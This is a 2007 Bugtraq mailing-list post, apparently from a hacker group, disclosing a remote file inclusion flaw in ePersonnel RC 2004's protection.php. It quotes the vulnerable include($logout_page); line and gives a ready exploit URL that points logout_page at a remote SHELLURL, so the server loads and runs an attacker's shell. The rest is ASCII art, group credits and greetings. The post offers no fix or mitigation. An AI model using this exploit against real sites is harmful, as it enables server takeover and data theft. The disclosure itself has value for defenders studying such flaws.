[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070827110603.14823.qmail@securityfocus.com>
Date: 27 Aug 2007 11:06:03 -0000
From: system-errrror@...mail.com
To: bugtraq@...urityfocus.com
Subject: ePersonnel_RC_2004 Remote File Bug
********************************************************************
********************************************************************
****
**** ePersonnel_RC_2004_02 Remote File Bug
****
********************************************************************
********************************************************************
********************************************************************
*** D0rk: N0t D0rk :(
***
********************************************************************
*** Bug in : "/protection.php"
***
********************************************************************
*** Vlu Code : include($logout_page);
***
********************************************************************
*** Exploit :
*** ----------
*** http://sitename.com/path/protection.php?logout_page=http://SHELLURL?
***
********************************************************************
********************************************************************
**
** # # # #
** # # # #
** # # # #
** # ## #### ## #
** ## ## ###### ## ##
** ## ## ###### ## ##
** ## ## #### ## ##
** ### ############ ###
** ########################
** ##############
** ######## ########## #######
** ### ## ########## ## ###
** ### ## ########## ## ###
** ### # ########## # ###
** ### ## ######## ## ###
** ## # ###### # ##
** ## # #### # ##
** ## ##
**
*********************************************************************
********************************|SpY W0Rm|***************************
*********************************************************************
******************* |The construction In the level |*****************
*********************************************************************
************************| Prepare by D@...ewil |*********************
*********************************************************************
*************|Discoverd By :Darkdewil[system-errrror]|***************
************ *************
***********|Contact : system-errrror[at]hotmail[dot]com |***********
********* *********
*********************************************************************
======>Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen<=====
*********************************************************************
----------------->sPECial THanks to :1923turk - Grup<----------------
**
**
**
** N0t :I'm happy kandil Whole muslim
**
**
*********************************************************************
*********************************************************************
Powered by blists - more mailing lists